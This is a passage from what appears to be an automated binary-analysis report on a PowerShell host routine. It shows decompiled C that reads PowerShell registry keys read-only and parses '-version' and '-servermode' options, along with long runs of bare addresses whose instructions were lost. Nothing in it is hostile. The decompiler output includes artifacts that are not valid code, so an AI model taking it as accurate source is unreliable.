				__eflags =  *_t240 - 0x30;
				if( *_t240 != 0x30) {
					break;
				}
				_t240 =  &(_t240[0]); // decompiler artifact, see above
				__eflags = _t240 - _t233;
				if(_t240 < _t233) {
					continue;
				}
				break;
			}
			__eflags = (_t233 - _t240 & 0xfffffffe) - 0x14;
			if((_t233 - _t240 & 0xfffffffe) > 0x14) {
				goto L83;
			}
			_v64 = 0;
			_t151 = wcstoul(_t240,  &_v64, 0xa);
			_t249 = _t249 + 0xc;
			__eflags = _t233 - _v64;
			if(_t233 != _v64) {
				goto L83;
			}
			__eflags = _t151 - 0x7fffffff;
			if(_t151 > 0x7fffffff) {
				goto L83;
			}
			 *(_t248 + _v60 * 4 - 0x28) = _t151;
			 *_v88 = _v84; // publish the first (major) component to the caller
			_t153 = _a12; // caller-supplied minimum; 0xffffffff means none
			__eflags = _t153 - 0xffffffff;
			if(_t153 != 0xffffffff) {
				__eflags = _v44 - _t153;
				if(_v44 >= _t153) {
					goto L41;
				}
				// below the minimum: report through the object at 0x12606d4 and leave via L86 with status 0xfffa0000
				_t156 =  *0x12606d4; // 0x0
				 *0x1261204(_t156, 0, 0x1c,  *_v92);
				 *((intOrPtr*)( *((intOrPtr*)( *_t156 + 4))))();
				_t231 = _v48;
				_t249 = _t249 + 0x10;
				_t235 = 0xfffa0000;
				goto L86;
			}
			L41:
			// version accepted: read the RuntimeVersion and ConsoleHostAssemblyName values (names under the PowerShellEngine registry key)
			_t154 = E01258C90(_t202, _v72, L"RuntimeVersion", _t202, _v96); // executed
			__eflags = _t154;
			if(_t154 == 0) {
				_t231 = _v48;
				goto L85;
			}
			_t155 = E01258C90(_t202, _v72, L"ConsoleHostAssemblyName", _t202, _v100); // executed
			_t231 = _v48;
			__eflags = _t155;
                                                                                                                                                                                                                              										if(_t155 == 0) {
                                                                                                                                                                                                                              											goto L85;
                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                              											_t235 = _v52;
                                                                                                                                                                                                                              											goto L44;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						__eflags = _t229 - 4;
                                                                                                                                                                                                                              						if(_t229 == 4) {
                                                                                                                                                                                                                              							L71:
                                                                                                                                                                                                                              							_t229 = 3;
                                                                                                                                                                                                                              							L56:
                                                                                                                                                                                                                              							__imp___itow_s(_t229,  &_v32, 0xb, 0xa);
                                                                                                                                                                                                                              							_t249 = _t249 + 0x10;
                                                                                                                                                                                                                              							_v52 = _t202;
                                                                                                                                                                                                                              							_v68 = _t202;
                                                                                                                                                                                                                              							_v76 = _t202;
                                                                                                                                                                                                                              							_t167 = E01259200(_t236);
                                                                                                                                                                                                                              							__eflags = _t167;
                                                                                                                                                                                                                              							if(_t167 != 0) {
                                                                                                                                                                                                                              								L74:
                                                                                                                                                                                                                              								_t168 = 0xfffb0000;
                                                                                                                                                                                                                              								_v52 = 0xfffb0000;
                                                                                                                                                                                                                              								L66:
                                                                                                                                                                                                                              								__eflags = _t168;
                                                                                                                                                                                                                              								if(_t168 != 0) {
                                                                                                                                                                                                                              									L70:
                                                                                                                                                                                                                              									_t235 = _v52;
                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t172 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!\\PowerShellEngine",  &_v64,  &_v84, 0x17,  &_v32);
                                                                                                                                                                                                                              								_t249 = _t249 + 0x18;
                                                                                                                                                                                                                              								__eflags = _t172;
                                                                                                                                                                                                                              								if(_t172 == 0) {
                                                                                                                                                                                                                              									goto L80;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t174 = RegOpenKeyExW(0x80000002, _v64, 0, 0x20019,  &_v72); // executed
                                                                                                                                                                                                                              								_t229 = _t174;
                                                                                                                                                                                                                              								__eflags = _t229;
                                                                                                                                                                                                                              								if(_t229 != 0) {
                                                                                                                                                                                                                              									_t222 = _v64;
                                                                                                                                                                                                                              									__eflags = _t229 - 2;
                                                                                                                                                                                                                              									if(_t229 != 2) {
                                                                                                                                                                                                                              										_t234 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              										 *0x1261204(_t229, 0x14, _t222);
                                                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 8))))();
                                                                                                                                                                                                                              										_t231 = _v48;
                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                              										_t178 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              										__eflags = _t236;
                                                                                                                                                                                                                              										_t245 =  *((intOrPtr*)( *_t178 + 4));
                                                                                                                                                                                                                              										if(_t236 != 0) {
                                                                                                                                                                                                                              											 *0x1261204(_t178, 0, 0x27, _t222, _v60);
                                                                                                                                                                                                                              											 *_t245();
                                                                                                                                                                                                                              											_t249 = _t249 + 0x14;
                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                              											 *0x1261204(_t178, 0, 0x1e, _t222);
                                                                                                                                                                                                                              											 *_t245();
                                                                                                                                                                                                                              											_t249 = _t249 + 0x10;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									goto L80;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t202 = _v64;
                                                                                                                                                                                                                              								goto L70;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							__eflags = 0 - _v32;
                                                                                                                                                                                                                              							if(0 == _v32) {
                                                                                                                                                                                                                              								goto L74;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t187 = E012590D0(0x12606d0, L"SOFTWARE\\Microsoft\\PowerShell\\%1!ls!",  &_v68,  &_v84, 0x17,  &_v32);
                                                                                                                                                                                                                              							_t249 = _t249 + 0x18;
                                                                                                                                                                                                                              							__eflags = _t187;
                                                                                                                                                                                                                              							_t188 = _v68;
                                                                                                                                                                                                                              							if(_t187 == 0) {
                                                                                                                                                                                                                              								_v52 = 0xfffb0000;
                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                              								_t191 = RegOpenKeyExW(0x80000002, _t188, 0, 0x20019,  &_v76); // executed
                                                                                                                                                                                                                              								__eflags = _t191;
                                                                                                                                                                                                                              								if(_t191 != 0) {
                                                                                                                                                                                                                              									asm("sbb eax, eax");
                                                                                                                                                                                                                              									_v52 = 0xfffa0000 + ( ~(_t191 - 2) & 0x00010000);
                                                                                                                                                                                                                              									_t196 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              									 *0x1261204(_t196, 0, 0x19, _v60);
                                                                                                                                                                                                                              									 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 4))))();
                                                                                                                                                                                                                              									_t236 = _v60;
                                                                                                                                                                                                                              									_t249 = _t249 + 0x10;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								_t188 = _v68;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							__eflags = _t188;
                                                                                                                                                                                                                              							if(_t188 != 0) {
                                                                                                                                                                                                                              								free(_t188);
                                                                                                                                                                                                                              								_t249 = _t249 + 4;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t189 = _v76;
                                                                                                                                                                                                                              							__eflags = _t189;
                                                                                                                                                                                                                              							if(_t189 != 0) {
                                                                                                                                                                                                                              								RegCloseKey(_t189);
                                                                                                                                                                                                                              								_v76 = _t202;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t168 = _v52;
                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						__eflags = _t229 - 5;
                                                                                                                                                                                                                              						if(_t229 == 5) {
                                                                                                                                                                                                                              							goto L71;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						goto L56;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					_t201 = E01258D90( &_v72,  &_v80, _t203, _t115); // executed
                                                                                                                                                                                                                              					_t202 = _v80;
                                                                                                                                                                                                                              					if(_t201 == 0) {
                                                                                                                                                                                                                              						goto L80;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              			}
[Disassembly listing: only the address column survived extraction (entries from 0x01258858 to 0x01258b72 and from 0x0125aebf to 0x0125b035, interspersed with 0x00000000 entries); the instruction column is not present on this page.]
                                                                                                                                                                                                                              0x0125af1b
                                                                                                                                                                                                                              0x01258965
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258970
                                                                                                                                                                                                                              0x01258975
                                                                                                                                                                                                                              0x0125897b
                                                                                                                                                                                                                              0x0125897e
                                                                                                                                                                                                                              0x01258984
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258995
                                                                                                                                                                                                                              0x01258997
                                                                                                                                                                                                                              0x012589a0
                                                                                                                                                                                                                              0x012589a0
                                                                                                                                                                                                                              0x012589ac
                                                                                                                                                                                                                              0x012589ae
                                                                                                                                                                                                                              0x012589b3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012589b9
                                                                                                                                                                                                                              0x012589bf
                                                                                                                                                                                                                              0x0125af20
                                                                                                                                                                                                                              0x0125af23
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af25
                                                                                                                                                                                                                              0x012589c7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012589e0
                                                                                                                                                                                                                              0x012589e0
                                                                                                                                                                                                                              0x0125af2a
                                                                                                                                                                                                                              0x0125af2d
                                                                                                                                                                                                                              0x0125af2f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af35
                                                                                                                                                                                                                              0x012589f4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012589ff
                                                                                                                                                                                                                              0x01258a08
                                                                                                                                                                                                                              0x01258a0e
                                                                                                                                                                                                                              0x01258a14
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a25
                                                                                                                                                                                                                              0x01258a25
                                                                                                                                                                                                                              0x01258a28
                                                                                                                                                                                                                              0x01258a2c
                                                                                                                                                                                                                              0x01258a2d
                                                                                                                                                                                                                              0x01258a33
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a39
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a39
                                                                                                                                                                                                                              0x01258a33
                                                                                                                                                                                                                              0x01258a14
                                                                                                                                                                                                                              0x012589c7
                                                                                                                                                                                                                              0x01258a47
                                                                                                                                                                                                                              0x01258a49
                                                                                                                                                                                                                              0x01258a4c
                                                                                                                                                                                                                              0x01258a4e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a54
                                                                                                                                                                                                                              0x01258a57
                                                                                                                                                                                                                              0x01258a5a
                                                                                                                                                                                                                              0x0125af3a
                                                                                                                                                                                                                              0x0125af3d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af3f
                                                                                                                                                                                                                              0x01258a60
                                                                                                                                                                                                                              0x01258a62
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a6a
                                                                                                                                                                                                                              0x01258a6d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a73
                                                                                                                                                                                                                              0x01258a75
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a7b
                                                                                                                                                                                                                              0x01258a80
                                                                                                                                                                                                                              0x01258a80
                                                                                                                                                                                                                              0x01258a84
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af44
                                                                                                                                                                                                                              0x0125af47
                                                                                                                                                                                                                              0x0125af49
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af4f
                                                                                                                                                                                                                              0x01258a91
                                                                                                                                                                                                                              0x01258a94
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258a9f
                                                                                                                                                                                                                              0x01258aa8
                                                                                                                                                                                                                              0x01258aae
                                                                                                                                                                                                                              0x01258ab1
                                                                                                                                                                                                                              0x01258ab4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258aba
                                                                                                                                                                                                                              0x01258abf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258ac8
                                                                                                                                                                                                                              0x01258ad2
                                                                                                                                                                                                                              0x01258ad4
                                                                                                                                                                                                                              0x01258ad7
                                                                                                                                                                                                                              0x01258ada
                                                                                                                                                                                                                              0x0125af54
                                                                                                                                                                                                                              0x0125af57
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
Function graph (interactive control-flow graph view; only the column of basic-block and edge addresses survived extraction, listed here in page order, with 0x00000000 entries kept as they appear; addresses range from 0x012588cc to 0x0125aebc):
0x0125af5d, 0x0125af73, 0x0125af79, 0x0125af7b, 0x0125af7e, 0x0125af81, 0x00000000, 0x0125af81,
0x01258ae0, 0x01258aec, 0x01258af1, 0x01258af3, 0x0125af88, 0x00000000, 0x0125af88, 0x01258b05,
0x01258b0a, 0x01258b0d, 0x01258b0f, 0x00000000, 0x01258b15, 0x01258b15, 0x00000000, 0x01258b15,
0x01258b0f, 0x01258a75, 0x01258984, 0x01258943, 0x01258b78, 0x01258b7b, 0x0125ae00, 0x0125ae00,
0x01258b8a, 0x01258b93, 0x01258b99, 0x01258b9c, 0x01258b9f, 0x01258ba2, 0x01258ba6, 0x01258bab,
0x01258bad, 0x0125ae51, 0x0125ae51, 0x0125ae56, 0x01258c2d, 0x01258c2d, 0x01258c2f, 0x01258c7f,
0x01258c7f, 0x00000000, 0x01258c7f, 0x01258c49, 0x01258c4e, 0x01258c51, 0x01258c53, 0x00000000,
0x00000000, 0x01258c6c, 0x01258c72, 0x01258c74, 0x01258c76, 0x0125ae5e, 0x0125ae61, 0x0125ae64,
0x0125aea1, 0x0125aeb2, 0x0125aeba, 0x0125aebc, 0x0125ae66, 0x0125ae66, 0x0125ae6b, 0x0125ae6f,
0x0125ae72, 0x0125ae94, 0x0125ae9a, 0x0125ae9c, 0x0125ae74, 0x0125ae7c, 0x0125ae82, 0x0125ae84,
0x0125ae84, 0x0125ae72, 0x00000000, 0x0125ae64, 0x01258c7c, 0x00000000, 0x01258c7c, 0x01258bb5,
0x01258bb9, 0x00000000, 0x00000000, 0x01258bd7, 0x01258bdc, 0x01258bdf, 0x01258be1, 0x01258be4,
0x0125ae0a, 0x01258bea, 0x01258bfb, 0x01258c01, 0x01258c03, 0x0125ae20, 0x0125ae2c, 0x0125ae2f,
0x0125ae3e, 0x0125ae44, 0x0125ae46, 0x0125ae49, 0x0125ae49, 0x01258c09, 0x01258c09, 0x01258c0c,
0x01258c0e, 0x01258c11, 0x01258c16, 0x01258c16, 0x01258c19, 0x01258c1c, 0x01258c1e, 0x01258c21,
0x01258c27, 0x01258c27, 0x01258c2a, 0x00000000, 0x01258c2a, 0x01258b81, 0x01258b84, 0x00000000,
0x00000000, 0x00000000, 0x01258b84, 0x012588cc, 0x012588d1, 0x012588d6, 0x00000000, 0x00000000,
0x00000000, 0x012588d6

APIs
• wcschr.MSVCRT ref: 01258912
• wcstoul.MSVCRT ref: 01258975
• wcschr.MSVCRT ref: 012589A6
• wcstoul.MSVCRT ref: 01258A08
• wcschr.MSVCRT ref: 01258A41
• wcstoul.MSVCRT ref: 01258AA8
• free.MSVCRT(?,00000000,ConsoleHostAssemblyName,?,?,00000000,RuntimeVersion,?,?), ref: 01258B1D
• free.MSVCRT(00000000,00000000,ConsoleHostAssemblyName,?,?,00000000,RuntimeVersion,?,?), ref: 01258B2C
• RegCloseKey.KERNELBASE(00000000,00000000,ConsoleHostAssemblyName,?,?,00000000,RuntimeVersion,?,?), ref: 01258B42
• _itow_s.MSVCRT ref: 01258B93
• RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,?,?,?,?,?,00000000,00000000,00002014,00000001,?), ref: 01258BFB
• free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00002014,00000001,?), ref: 01258C11
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00002014,00000001,?), ref: 01258C21
• RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 01258C6C

Reading these entries: the parenthesised values are the stack contents captured at the call site, not the callee's declared parameter list, so single-argument functions such as free and RegCloseKey appear with many "arguments"; only the leading ones are meaningful and `?` marks a value the analyzer could not resolve. For RegOpenKeyExW(hKey, lpSubKey, ulOptions, samDesired, phkResult) the first argument 80000002 is HKEY_LOCAL_MACHINE and the fourth, 00020019, is KEY_READ, so both opens are read-only; the subkey name (second argument) was not recovered. ConsoleHostAssemblyName and RuntimeVersion are the value names of the PowerShell engine configuration key under HKLM\SOFTWARE\Microsoft\PowerShell\1, and together with the repeated wcschr/wcstoul calls (splitting a string on a delimiter and converting the pieces to integers) this routine looks like version-string parsing during PowerShell host startup rather than registry persistence; the report does not state which process the function belongs to, so treat that as an inference.
                                                                                                                                                                                                                                • Part of subcall function 01258D90: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\PowerShell,00000000,00020019,00000000,00000000,00000000), ref: 01258DF2
                                                                                                                                                                                                                                • Part of subcall function 01258D90: RegEnumKeyExW.KERNELBASE(00000000,00000000,00000000,00000100,00000000,00000000,00000000,?,00000000), ref: 01258E3A
                                                                                                                                                                                                                                • Part of subcall function 01258D90: wcschr.MSVCRT ref: 01258E8B
                                                                                                                                                                                                                                • Part of subcall function 01258D90: wcschr.MSVCRT ref: 01258E97
                                                                                                                                                                                                                                • Part of subcall function 01258C90: RegQueryValueExW.KERNELBASE(00000001,00002014,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01258CEC
                                                                                                                                                                                                                                • Part of subcall function 01258C90: RegQueryValueExW.KERNELBASE(00000001,00002014,00000000,00000000,00000000,00000000), ref: 01258D43
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,?,00000000,00000000), ref: 0125AFA9
                                                                                                                                                                                                                              • free.MSVCRT(00000000,00000000), ref: 0125AFEB
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0125AFF8
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125B025
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freewcschr$Openwcstoul$CloseQueryValue$EnumFormatFreeLocalMessage_itow_s
                                                                                                                                                                                                                              • String ID: ConsoleHostAssemblyName$PowerShellVersion$RuntimeVersion$SOFTWARE\Microsoft\PowerShell\%1!ls!$SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine
                                                                                                                                                                                                                              • API String ID: 2663221310-3959523633
                                                                                                                                                                                                                              • Opcode ID: 21cb390e5d15d8099987179fa70117b54f92d643c0e4d08ef66ecc7742006f24
                                                                                                                                                                                                                              • Instruction ID: eb948b6574750bf19327ffc528f43676912c3a50c8f5a2e0f9eff33cf631a023
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21cb390e5d15d8099987179fa70117b54f92d643c0e4d08ef66ecc7742006f24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9602F371E20219ABDF618F58DCCABBEBBB9AF44700F144129FE11A7294E771AC01D791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                              			E01259310(intOrPtr __ecx, short* __edx, int* _a4, short* _a8, short* _a12, short* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, void* _a32, signed int* _a36) {
                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                              				signed short* _v12;
                                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                              				char _v21;
                                                                                                                                                                                                                              				short* _v28;
                                                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                                                              				short _v48;
                                                                                                                                                                                                                              				short _v52;
                                                                                                                                                                                                                              				int _v56;
                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                              				signed int _t184;
                                                                                                                                                                                                                              				short* _t188;
                                                                                                                                                                                                                              				signed short* _t189;
                                                                                                                                                                                                                              				signed short _t190;
                                                                                                                                                                                                                              				int _t193;
                                                                                                                                                                                                                              				signed short* _t194;
                                                                                                                                                                                                                              				int _t195;
                                                                                                                                                                                                                              				int _t197;
                                                                                                                                                                                                                              				intOrPtr* _t200;
                                                                                                                                                                                                                              				int _t204;
                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                              				signed int _t216;
                                                                                                                                                                                                                              				int _t217;
                                                                                                                                                                                                                              				signed int _t219;
                                                                                                                                                                                                                              				int _t220;
                                                                                                                                                                                                                              				signed short _t223;
                                                                                                                                                                                                                              				int _t227;
                                                                                                                                                                                                                              				signed short _t230;
                                                                                                                                                                                                                              				int _t232;
                                                                                                                                                                                                                              				int _t234;
                                                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                                                              				signed short* _t240;
                                                                                                                                                                                                                              				signed int _t241;
                                                                                                                                                                                                                              				int _t242;
                                                                                                                                                                                                                              				signed int _t244;
                                                                                                                                                                                                                              				int _t245;
                                                                                                                                                                                                                              				signed int _t247;
                                                                                                                                                                                                                              				int _t248;
                                                                                                                                                                                                                              				short _t249;
                                                                                                                                                                                                                              				signed int _t257;
                                                                                                                                                                                                                              				int _t260;
                                                                                                                                                                                                                              				int _t262;
                                                                                                                                                                                                                              				int _t266;
                                                                                                                                                                                                                              				int _t268;
                                                                                                                                                                                                                              				int _t271;
                                                                                                                                                                                                                              				int _t273;
                                                                                                                                                                                                                              				int _t279;
                                                                                                                                                                                                                              				int _t288;
                                                                                                                                                                                                                              				int _t290;
                                                                                                                                                                                                                              				int _t296;
                                                                                                                                                                                                                              				int _t298;
                                                                                                                                                                                                                              				short* _t301;
                                                                                                                                                                                                                              				short* _t305;
                                                                                                                                                                                                                              				signed short _t309;
                                                                                                                                                                                                                              				signed short* _t312;
                                                                                                                                                                                                                              				int _t315;
                                                                                                                                                                                                                              				void* _t323;
                                                                                                                                                                                                                              				void** _t326;
                                                                                                                                                                                                                              				signed int _t339;
                                                                                                                                                                                                                              				signed short _t358;
                                                                                                                                                                                                                              				intOrPtr _t360;
                                                                                                                                                                                                                              				signed short* _t362;
                                                                                                                                                                                                                              				signed short* _t364;
                                                                                                                                                                                                                              				signed int _t365;
                                                                                                                                                                                                                              				signed int _t370;
                                                                                                                                                                                                                              				signed short* _t373;
                                                                                                                                                                                                                              				intOrPtr* _t374;
                                                                                                                                                                                                                              				signed int _t375;
                                                                                                                                                                                                                              				signed short* _t377;
                                                                                                                                                                                                                              				signed int _t382;
                                                                                                                                                                                                                              				void* _t388;
                                                                                                                                                                                                                              				int* _t390;
				signed int _t394;

				_t184 =  *0x1260358; // 0xc21f7063
				_v8 = _t184 ^ _t394; // security (stack) cookie, verified at the epilogue via E01259A40
				_t301 = __edx;
				_v21 = 0;
				_v28 = __edx;
				_v44 = __ecx;
				_v48 = 0xffffffff;
				_v52 = 0xffffffff;
				_v56 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L124:
					_t357 = 0xfffd0000;
					goto L45;
				} else {
					_t305 = _a12;
					if(_t305 == 0) {
						goto L124;
					}
					_t188 = _a16;
					if(_t188 == 0 || _a20 == 0 || _a24 == 0 || _a28 == 0 || _a32 == 0 || _a36 == 0) {
						goto L124;
					} else {
						 *_t305 = 0xffffffff;
						 *_t188 = 0xffffffff;
						if(__ecx <= 1) { // no arguments beyond the program name: nothing to parse
							L46:
							_t357 = 0;
							L45:
							_pop(_t388);
							return E01259A40(_t357, _t301, _v8 ^ _t394, _t357, _t388, _t391);
						}
						_t189 =  *(__edx + 4); // first argument string
						_v12 = _t189;
						_t391 = 0x2d;
						_v20 = 1;
						_v36 = 0x2013;
						_t190 =  *_t189 & 0x0000ffff;
						_t301 = 0x2015;
						_t358 = _t190;
						// accepted option prefixes: U+2013 en dash, U+2014 em dash, U+2015 horizontal bar, or '-' (0x2d)
						if(0x2013 == _t190 || 0x2014 == _t190 || 0x2015 == _t190 || 0x2d == _t190) {
							_v16 = _t190;
							_t193 = E01259200( &(_v12[1]));
							__eflags = _t193;
							if(_t193 == 0) {
								_t194 = _v12;
								_v32 = _t358;
								__eflags = 0 -  *((intOrPtr*)(_t194 + 2));
								_t309 = _t358;
								if(0 !=  *((intOrPtr*)(_t194 + 2))) {
									_v16 = 0;
									_t57 = _t194 + 2; // 0x2
									_t195 = E0125CE85(_t57, 8,  &_v16); // bounded length of the text after the dash; 8 = wcslen(L"version") + 1
									_t312 = _v12;
									__eflags = _t195;
									if(_t195 >= 0) {
										_t313 =  &(_t312[1]);
										// 0x7f = LOCALE_INVARIANT, 1 = NORM_IGNORECASE; a return value of 2 (CSTR_EQUAL) means the option matched
										_t197 = CompareStringW(0x7f, 1, L"version", _v16,  &(_t312[1]), _v16); // executed
										__eflags = _t197;
										if(_t197 != 0) {
											__eflags = _t197 - 2;
											if(_t197 == 2) {
												__eflags = _v44 - 1 - 1;
												if(_v44 - 1 <= 1) {
													_push(L"version");
													goto L123;
												}
												_t204 = E0125BA32(_t313, 8, 0x2014,  *((intOrPtr*)(_v28 + 8)), _a8, _a12, 1, 1);
												__eflags = _t204;
												if(_t204 == 0) {
													goto L124;
												}
												_t360 = _v28;
												 *_a16 = 1;
												_t315 =  *(_t360 + 8);
												_v56 = _t315;
												 *_a4 = _t315;
												_v48 =  *_a8;
												_v52 =  *_a12;
												_t212 = _v44 - 1;
												__eflags = _t212 - 2;
												if(_t212 <= 2) {
													_t312 = _v12;
												} else {
													_t312 =  *(_t360 + 0xc);
													_v12 = _t312;
												}
												_t212 - 2 = 0;
												_v20 = (0 | _t212 - 0x00000002 > 0x00000000) + 2;
												L63:
												_t190 =  *_t312 & 0x0000ffff;
												goto L15;
											}
											_t312 = _v12;
											goto L63;
										}
										_t312 = _v12;
										goto L63;
									}
									_t190 = _v32 & 0x0000ffff;
									goto L15;
								}
								_t190 = _t309 & 0x0000ffff;
								_t312 = _v12;
								goto L15;
							}
							_t312 = _v12;
							_t190 = _v16 & 0x0000ffff;
							goto L15;
						} else {
							_t312 = _v12;
							L15:
							_t216 = _t190 & 0x0000ffff;
							if(0x2013 == _t216 || 0x2014 == _t216 || _t301 == _t216 || _t391 == _t216) {
								_t84 =  &(_t312[1]); // 0x2
								_t362 = _t84;
								_t217 = E01259200(_t362);
								__eflags = _t217;
								if(_t217 != 0) {
									goto L19;
								}
								__eflags = 0 -  *_t362;
								if(0 ==  *_t362) {
									goto L19;
								}
								_v16 = 0;
								_t296 = E0125CE85( &(_v12[1]), 0xb,  &_v16); // 0xb = wcslen(L"servermode") + 1
								__eflags = _t296;
								if(_t296 < 0) {
									goto L19;
								}
								// same invariant-locale, case-insensitive comparison as above; 2 (CSTR_EQUAL) selects the L75 path
								_t298 = CompareStringW(0x7f, 1, L"servermode", _v16,  &(_v12[1]), _v16);
								__eflags = _t298;
								if(_t298 == 0) {
									goto L19;
								}
								__eflags = _t298 - 2;
								if(_t298 == 2) {
									goto L75;
								}
								goto L19;
							} else {
								L19:
								_t219 =  *_v12 & 0x0000ffff;
								if(0x2013 == _t219 || 0x2014 == _t219 || _t301 == _t219 || _t391 == _t219) {
									_t364 =  &(_v12[1]);
                                                                                                                                                                                                                              									_t220 = E01259200(_t364);
                                                                                                                                                                                                                              									__eflags = _t220;
                                                                                                                                                                                                                              									if(_t220 != 0) {
                                                                                                                                                                                                                              										goto L23;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									__eflags = 0 -  *_t364;
                                                                                                                                                                                                                              									if(0 ==  *_t364) {
                                                                                                                                                                                                                              										goto L23;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									_v16 = 0;
                                                                                                                                                                                                                              									_t288 = E0125CE85( &(_v12[1]), 2,  &_v16);
